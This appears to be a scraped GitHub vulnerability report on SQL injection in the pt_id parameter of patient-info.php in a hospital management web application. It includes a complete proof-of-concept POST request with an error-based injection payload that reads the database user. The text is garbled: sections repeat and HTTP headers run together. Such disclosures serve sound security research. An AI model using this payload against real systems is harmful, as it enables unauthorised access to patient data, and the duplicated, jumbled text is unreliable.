In the file patient info Php, code line 87 - pt passed by post at code line 90_ The id parameter is assigned to $pt_ Id, followed by $pt_ The ID is brought into the database for query without any filtering, mysqli_ Query returns the database connection information and the results of SQL statement execution. Because the error message is not masked, SQL injection vulnerabilities are created
We can use sqlmap to validate
Manual SQL injection proof
2.POC:
POST /patient-info.php HTTP/1.1Host: vulhms.test
Content-Length: 160Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://vulhms.testContent-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://vulhms.test/patient-info.phpAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=iljducsilkhqvpp8up2b3uv1rg
Connection: close
pt_id=1' or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace&pt_btn=Go%21
The text was updated successfully, but these errors were encountered:
SQL injection vulnerability in the Hospital Management Center search box
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
1.Vulnerability analysis
In the file patient info Php, code line 87 - pt passed by post at code line 90_ The id parameter is assigned to $pt_ Id, followed by $pt_ The ID is brought into the database for query without any filtering, mysqli_ Query returns the database connection information and the results of SQL statement execution. Because the error message is not masked, SQL injection vulnerabilities are created
2.POC:
The text was updated successfully, but these errors were encountered: